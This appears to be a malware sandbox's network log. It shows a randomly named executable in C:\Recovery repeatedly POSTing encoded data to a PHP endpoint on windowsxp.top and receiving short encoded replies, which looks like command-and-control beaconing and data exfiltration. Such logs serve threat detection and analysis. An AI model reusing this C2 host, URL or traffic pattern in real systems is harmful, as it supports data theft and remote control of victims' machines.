                                                                                                                  Oct 27, 2024 19:22:50.923379898 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:51.274605989 CET | 1716 | OUT | Data Raw: 50 56 58 5a 5e 53 56 5e 54 58 57 54 54 5c 5b 5e 59 5f 5b 5c 52 5f 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PVXZ^SV^TXWTT\[^Y_[\R_RYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'1_"\66-3'8 ;<><8Q7"<,['^?<..!Y##X(
                                                                                                                  Oct 27, 2024 19:22:51.519530058 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  10 | 192.168.2.4 | 49757 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:51.721949100 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:22:52.072951078 CET | 1008 | OUT | Data Raw: 55 50 5d 5b 5b 5c 56 50 54 58 57 54 54 55 5b 5f 59 5d 5b 51 52 50 52 5c 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UP][[\VPTXWTTU[_Y][QRPR\T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$2. *%]#68-4'+(Q/-8><""3X,-+=<&.!Y##X(7
                                                                                                                  Oct 27, 2024 19:22:52.346030951 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:52.558535099 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:52.666775942 CET | 781 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:52 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HdMWpEI2Ku0JWCAx2lYQhbp8DAnNDv4eAn6Ukcl0Fbxuu90f4QvlaWCWmM4b%2BMxxepk%2BlLx8%2F%2BVoQvcW%2BYBiGLt23lwPSSiPIyttsZlL6%2BZO%2FJnW6%2F6haoZIT5h9ooSt"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6c8cefc0c0b-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2078&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1353&delivery_rate=677268&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  11 | 192.168.2.4 | 49758 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:52.932419062 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:22:53.289885044 CET | 1012 | OUT | Data Raw: 50 52 5d 5b 5e 5a 53 57 54 58 57 54 54 54 5b 5b 59 5d 5b 5f 52 51 52 59 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PR][^ZSWTXWTTT[[Y][_RQRYT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']2-/5*!64]:$'(;)< V#?-.;^*)-!Y##X('


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  12 | 192.168.2.4 | 49759 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:53.446664095 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  13 | 192.168.2.4 | 49760 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:53.949356079 CET | 345 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Oct 27, 2024 19:22:54.305499077 CET | 1012 | OUT | Data Raw: 55 51 58 5c 5b 59 56 52 54 58 57 54 54 57 5b 5f 59 5d 5b 59 52 50 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UQX\[YVRTXWTTW[_Y][YRPRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY']&^!)658^.B4_'(;--;=/7 2Y8-$)<=-/!Y##X(+
                                                                                                                  Oct 27, 2024 19:22:54.542237043 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:54.857613087 CET | 767 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rf99ub9fvT8SQbUdaq%2FugyLdcoox1VAPNZhqbZbxiyMCUVWTFrrTR6%2B6iK3KLecJiiGgjxeBBCB8FBiALctnmDT7%2FCQiko5WWsdRrWd6ftbA3xwrbPLHNdKl9mb51CjJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6d68dd63acd-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1102&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1357&delivery_rate=1318761&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a
                                                                                                                  Data Ascii: 41R[P
                                                                                                                  Oct 27, 2024 19:22:54.857682943 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  14 | 192.168.2.4 | 49761 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:54.983453989 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:55.336704016 CET | 1012 | OUT | Data Raw: 55 52 5d 59 5e 52 53 57 54 58 57 54 54 54 5b 5d 59 5d 5b 58 52 53 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UR]Y^RSWTXWTTT[]Y][XRSRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$2+6X6[.$7388,=;=<8T Y8.'X>/*X,/!Y##X('
                                                                                                                  Oct 27, 2024 19:22:55.579770088 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:55.891129017 CET | 776 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:55 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oke9c8LTJIBlzH%2BvXC7xi2BTbTiFDf%2FT%2BQLUzxRt7N7yH%2FzDdbmAYCIAkm2QrA%2B1bg2fzxMtBpP0dU2K9iq6PgkdZp9FkuobIsnlkmJSMQSBwmN8sxQ0uDL5ugz92nvR"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6dcfd0b45f6-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1286&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1143759&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  15 | 192.168.2.4 | 49762 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:56.017615080 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:56.368505955 CET | 1012 | OUT | Data Raw: 50 56 58 59 5e 52 56 51 54 58 57 54 54 5d 5b 52 59 58 5b 50 52 56 52 5a 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PVXY^RVQTXWTT][RYX[PRVRZT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$1X 6:2"/-$#3;<P/X4V*<7 ,;;[?<:!Y##X(
                                                                                                                  Oct 27, 2024 19:22:56.647799015 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:56.866482973 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:56.975310087 CET | 777 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ueyPiU%2BIvKdC2lFuR2uLSMvG6FoTFYQ8scmRItGKGUL6%2FjDWX3XBiB667x0%2FokeG9g1zzrehaP1ZMOTG2D1ZUBdQP8aM%2Fxj%2BQF0hXGboHM%2Fca3HDzIHvQdlt92z0iAG"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6e3aebc2e1f-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1827&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=815315&cwnd=240&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  16 | 192.168.2.4 | 49763 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:56.594444036 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1716
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:56.946412086 CET1716OUTData Raw: 50 55 58 5e 5e 53 53 54 54 58 57 54 54 5c 5b 5f 59 5f 5b 51 52 50 52 52 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: PUX^^SSTTXWTT\[_Y_[QRPRRT\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY$2.,Y")*"8.7%;#,*'#8/X=,=.!Y##X(
                                                                                                                  Oct 27, 2024 19:22:57.197110891 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:57.507241011 CET | 924 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CxkmJB5eV%2By%2BoFggwff1pF7Zo9DuPzzPzkFNJrC9AISSBHdndcwbrkbWgJMsxDtGgj0qRIT%2FdrvqACs7%2Bf15Oo8rKoQ53HLOFj75IJtw7SlP8hsv13zPt1IH9ZFNYmI%2B"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6e71cd2b78d-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1075&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2037&delivery_rate=1401742&cwnd=67&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1a 21 00 23 58 34 52 3d 2f 3e 0d 2a 22 31 13 27 3c 39 5b 38 0c 02 58 3e 03 18 0d 3a 38 21 0f 24 1a 0b 44 3f 00 38 59 37 00 34 56 2a 1f 21 5e 00 1c 24 05 36 3e 2d 53 25 3b 02 19 27 20 02 5f 22 2e 2b 15 3d 00 00 0c 3f 00 20 12 3c 16 06 0d 3b 59 39 54 25 17 31 00 3b 38 25 07 3f 00 2a 54 0c 14 21 1f 3a 06 2b 01 22 1f 3d 56 3d 21 20 11 24 2e 20 51 33 3a 34 56 28 3f 3f 58 2b 03 13 5d 21 12 0e 59 28 28 2e 16 30 3e 23 1e 29 04 22 54 22 0e 29 53 0f 30 59 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98!#X4R=/>*"1'<9[8X>:8!$D?8Y74V*!^$6>-S%;' _".+=? <;Y9T%1;8%?*T!:+"=V=! $. Q3:4V(??X+]!Y((.0>#)"T")S0YP0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  17 | 192.168.2.4 | 49764 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:57.106857061 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1012
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:57.462683916 CET1012OUTData Raw: 55 57 58 58 5b 5c 56 54 54 58 57 54 54 51 5b 5e 59 58 5b 58 52 57 52 53 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UWXX[\VTTXWTTQ[^YX[XRWRST\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'Y2(^5*5!4\.3V->/> V7(;[8>/=,/!Y##X(3
                                                                                                                  Oct 27, 2024 19:22:57.713009119 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:58.031605959 CET | 778 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:57 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=f%2Fk7jlHcIBN7U7y3EJ3z1X5%2FK2pU9%2FXrtbTcLeThq1gBgi8mgOFr9NFzwuwb4Xy6wb%2FQ1ZOvgZeW9%2BQ8GhREY%2BA2OPnxxGFnxW1Fmu5RGSeQaGQFlvj8Dx13zX0Ih4Ud"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6ea59ad485e-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1143&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1333&delivery_rate=1283687&cwnd=243&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  18 | 192.168.2.4 | 49765 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:58.217063904 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
                                                                                                                  Oct 27, 2024 19:22:58.571202993 CET1008OUTData Raw: 55 52 5d 59 5e 5f 56 50 54 58 57 54 54 55 5b 5f 59 5d 5b 51 52 56 52 5e 54 5c 46 53 56 5d 58 51 5f 41 56 47 55 58 5a 5d 5e 5f 52 53 57 52 5b 5a 56 50 5d 5f 59 5b 5b 56 5e 5e 5f 5c 5c 55 5f 5d 5f 5c 44 5c 57 5f 5b 50 42 58 5a 5e 42 59 5c 51 54 5a
                                                                                                                  Data Ascii: UR]Y^_VPTXWTTU[_Y][QRVR^T\FSV]XQ_AVGUXZ]^_RSWR[ZVP]_Y[[V^^_\\U_]_\D\W_[PBXZ^BY\QTZ[S[XXYQ]TZG[UWZU[]U]B]_TCVTVB]_YSS__V_UQ]UUZCY\Z^YSZ\\\_]\R\]W]UU^_ZZ[[_Z[]T_QGV\XX_UQ^Z[T[WSPX]\QY]XY'[%>3!&"6+94(_'(-> V(?7$8=Y)>.!Y##X(7
                                                                                                                  Oct 27, 2024 19:22:58.819880962 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                  Oct 27, 2024 19:22:59.142858028 CET | 772 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Sun, 27 Oct 2024 18:22:59 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w1vgpBbBJC6jwRSsy%2B3EebeI5gMYNDAJVdnUlQSETF4XrX6Qxzj6zcz%2FvLolrxPtURKVYLezHztTLgY2ctCSmoi2iUwO8R2oHYJLr8nNjyRNxDWSMekyjdM5ox3H%2Bo36"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8d94b6f1381e345c-DFW
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1319&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1329&delivery_rate=1213746&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 52 5b 50 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41R[P0


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                  19 | 192.168.2.4 | 49768 | 188.114.97.3 | 80 | 3512 | C:\Recovery\AvdGjRxbXYfvkpkpztF.exe
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  Oct 27, 2024 19:22:59.291584969 CET | 321 | OUT | POST /ExternaltoPhppollcpuupdateTrafficpublic.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                                                                  Host: windowsxp.top
                                                                                                                  Content-Length: 1008
                                                                                                                  Expect: 100-continue
